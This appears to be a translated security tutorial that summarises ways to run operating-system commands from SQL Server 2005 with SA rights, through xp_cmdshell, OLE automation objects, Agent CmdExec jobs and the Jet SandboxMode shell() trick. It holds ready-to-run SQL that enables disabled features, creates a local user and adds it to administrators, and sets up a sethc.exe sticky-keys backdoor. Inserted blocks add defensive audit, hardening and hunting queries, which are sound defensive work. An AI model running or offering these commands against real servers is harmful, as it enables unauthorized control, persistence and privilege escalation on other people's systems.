SQL Server 2005 SA Command Execution Methods: Summary | Security Tutorial

Source: Internet
Author: User
Tags: ole

1. xp_cmdshell

EXEC master..xp_cmdshell 'ipconfig'

Enabling xp_cmdshell:

-- Allow advanced options to be changed.
EXEC sp_configure 'show advanced options', 1
GO
-- Update the currently configured value for advanced options.
RECONFIGURE
GO
-- Enable the feature.
EXEC sp_configure 'xp_cmdshell', 1
GO
-- Update the currently configured value of this feature.
RECONFIGURE
GO
2. sp_OACreate

Creating a Wscript.Shell object:

USE master
DECLARE @o int
EXEC sp_oacreate 'Wscript.Shell', @o OUT
EXEC sp_OAMethod @o, 'run', NULL, 'cmd /c net user > c:\test.tmp'

Creating Scripting.FileSystemObject objects:

DECLARE @o int
EXEC sp_oacreate 'Scripting.FileSystemObject', @o OUT
EXEC sp_OAMethod @o, 'copyfile', NULL, 'c:\windows\explorer.exe', 'c:\windows\system32\sethc.exe';
DECLARE @oo int
EXEC sp_oacreate 'Scripting.FileSystemObject', @oo OUT
EXEC sp_OAMethod @oo, 'copyfile', NULL, 'c:\windows\system32\sethc.exe', 'c:\windows\system32\dllcache\sethc.exe';

You can use Utilman.exe instead of sethc.exe to achieve the same effect. The back door is cool, huh?

Creating a Shell.Application object:

DECLARE @o int
EXEC sp_oacreate 'Shell.Application', @o OUT
EXEC sp_OAMethod @o, 'ShellExecute', NULL, 'cmd.exe', 'cmd /c net user > c:\test.txt', 'c:\windows\system32', '', 1;

Enabling OLE Automation Procedures:

sp_configure 'show advanced options', 1;
GO
RECONFIGURE;
GO
sp_configure 'Ole Automation Procedures', 1;
GO
RECONFIGURE;
GO
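A defender's counterpart to the two enabling sequences above, added here as an example and not part of the original page: it reports the state of the surface-area options this page relies on (xp_cmdshell, Ole Automation Procedures, and Ad Hoc Distributed Queries, which the OPENROWSET calls in the SandboxMode section need), disables them again, and lists who holds sysadmin, since any sysadmin can simply switch them back on. It assumes sysadmin rights on SQL Server 2005 or later.

```sql
-- Added example: audit and disable the surface-area options abused on this page.
-- Run as a sysadmin; sys.configurations and these option names exist in
-- SQL Server 2005 and later.

-- 1. Report the current state (value_in_use is sql_variant, hence the CAST).
SELECT name, CAST(value_in_use AS int) AS value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'Ole Automation Procedures',
               'Ad Hoc Distributed Queries', 'show advanced options');

-- 2. Disable them: the reverse of the enabling sequence shown above.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
EXEC sp_configure 'Ole Automation Procedures', 0;
EXEC sp_configure 'Ad Hoc Distributed Queries', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;

-- 3. Verify: every row should now show 0.
SELECT name, CAST(value_in_use AS int) AS value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'Ole Automation Procedures',
               'Ad Hoc Distributed Queries');

-- 4. The setting is only as strong as the sysadmin list: every login shown
--    here can re-enable all of the above with the same sp_configure calls.
SELECT p.name, p.type_desc, p.is_disabled
FROM sys.server_principals AS p
WHERE IS_SRVROLEMEMBER('sysadmin', p.name) = 1
ORDER BY p.name;
```

Schedule the first and last queries as a periodic check; a non-zero value reappearing, or a new sysadmin member, is the earliest signal that one of the techniques on this page is being set up.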
The idea in each case is to obtain the COM object and then work through it.

Wscript.Shell can call into the system to run basic DOS commands. To prevent abuse, this component can be renamed by editing the registry. The keys

HKEY_CLASSES_ROOT\wscript.shell\
HKEY_CLASSES_ROOT\wscript.shell.1\

are renamed to something different, for example Wscript.shell_changename and Wscript.shell.1_changename; afterwards the component is called normally by its new name. The CLSID value must be changed as well:

HKEY_CLASSES_ROOT\wscript.shell\clsid\ (the default value of the key)
HKEY_CLASSES_ROOT\wscript.shell.1\clsid\ (the default value of the key)

This applies to Wscript.Shell, Scripting.FileSystemObject and Shell.Application alike.
3. JOB

Executing a command through a job requires the SQLServerAgent service to be running; the following statement starts it:

EXEC master.dbo.xp_servicecontrol 'start', 'SQLServerAgent'

USE msdb
CREATE TABLE [jncsql] (resulttxt nvarchar(1024) NULL)
EXEC sp_delete_job NULL, 'x'
EXEC sp_add_job 'x'
EXEC sp_add_jobstep NULL, 'x', NULL, '1', 'CmdExec', 'cmd /c net user > c:\test.test'
EXEC sp_add_jobserver NULL, 'x', @@servername
EXEC sp_start_job 'x';
4. SandboxMode (what is often called "sandbox mode" on the Internet)

Rationale: invoke the Shell function of Access (Jet) to execute an arbitrary command with system privileges. Before trying this function, a switch called SandboxMode has to be opened in the registry.

Registry key: HKEY_LOCAL_MACHINE\Software\Microsoft\Jet\4.0\Engines\SandboxMode. The default value is 2. A value of 0 disables sandbox mode entirely; 1 uses sandbox mode for Access applications only; 2 uses sandbox mode for non-Access applications; 3 means the security setting is fully turned on. With a value of 1 or 0 the command can be executed.

EXEC sp_addlinkedserver 'testsql', 'OLE DB Provider for Jet', 'microsoft.jet.oledb.4.0', 'c:\windows\system32\ias\ias.mdb'
EXEC master..xp_regwrite 'HKEY_LOCAL_MACHINE', 'Software\microsoft\jet\4.0\engines', 'SandboxMode', 'REG_DWORD', 1
EXEC master..xp_regread 'HKEY_LOCAL_MACHINE', 'Software\microsoft\jet\4.0\engines', 'SandboxMode'
SELECT * FROM OPENROWSET('microsoft.jet.oledb.4.0', ';database=c:\windows\system32\ias\ias.mdb', 'select shell("cmd.exe /c net user test test /add")')
SELECT * FROM OPENROWSET('Microsoft.Jet.OLEDB.4.0', ';database=c:\windows\system32\ias\ias.mdb', 'select shell("cmd.exe /c net localgroup administrators test /add")')

The following two MDB files ship with the system:

C:\WINDOWS\system32\ias\dnary.mdb
C:\WINDOWS\system32\ias\ias.mdb
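A hunting query for the traces the job and SandboxMode techniques leave on a server, added here as an example rather than taken from the original page. It assumes sysadmin rights; xp_regread is an undocumented extended procedure, used here with an OUTPUT parameter to capture the value, and the remediation lines at the end use the page's own names 'x' and 'testsql' as placeholders.

```sql
-- Added example: find the artifacts of the JOB and SandboxMode techniques.
-- Run as a sysadmin.

-- 1. Agent jobs whose steps run OS commands or scripts rather than T-SQL
--    (the PowerShell subsystem only exists from SQL Server 2008 on).
SELECT j.name AS job_name, j.enabled, s.step_id, s.subsystem, s.command,
       SUSER_SNAME(j.owner_sid) AS owner, j.date_created
FROM msdb.dbo.sysjobs AS j
JOIN msdb.dbo.sysjobsteps AS s ON s.job_id = j.job_id
WHERE s.subsystem IN ('CmdExec', 'ActiveScripting', 'PowerShell')
ORDER BY j.date_created DESC;

-- 2. Linked servers that point at the Jet provider, as 'testsql' above does.
SELECT name, provider, data_source, product
FROM sys.servers
WHERE is_linked = 1 AND provider LIKE '%Jet%';

-- 3. Current Jet SandboxMode value. 0 and 1 leave SQL Server (a non-Access
--    application) unsandboxed, which is what the technique above needs;
--    2 (the default) and 3 sandbox it.
DECLARE @mode int;
EXEC master..xp_regread 'HKEY_LOCAL_MACHINE',
     'Software\Microsoft\Jet\4.0\Engines', 'SandboxMode', @mode OUTPUT;
SELECT @mode AS sandbox_mode,
       CASE WHEN @mode IN (0, 1) THEN 'WEAK: Jet shell() reachable from SQL Server'
            ELSE 'ok' END AS assessment;

-- 4. Remediation for a confirmed finding (names are placeholders from this page).
-- EXEC msdb.dbo.sp_delete_job @job_name = 'x';
-- EXEC sp_dropserver @server = 'testsql', @droplogins = 'droplogins';
-- EXEC master..xp_regwrite 'HKEY_LOCAL_MACHINE',
--      'Software\Microsoft\Jet\4.0\Engines', 'SandboxMode', 'REG_DWORD', 3;
```

Any CmdExec step owned by an unexpected login, or a Jet linked server nobody can account for, is worth treating as an incident rather than a misconfiguration.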
Summary

The above covers most of the methods (looking back, I have forgotten a few, haha). With some lateral thinking you can find several more. Many of them are disabled by default, and real engagements usually come with many restrictions, but each can be worked around one by one: use the components to gather server information, read and create files, and so on. It all still comes down to a thorough understanding of one word: permission.

Notes

- About *.exe in c:\windows\system32\ and C:\Windows\System32\Dllcache.
- About cmd.exe and command.exe.
- About net.exe and net1.exe.
- If the MDB file does not exist, we can upload one.
- There is more than one component that can execute commands.
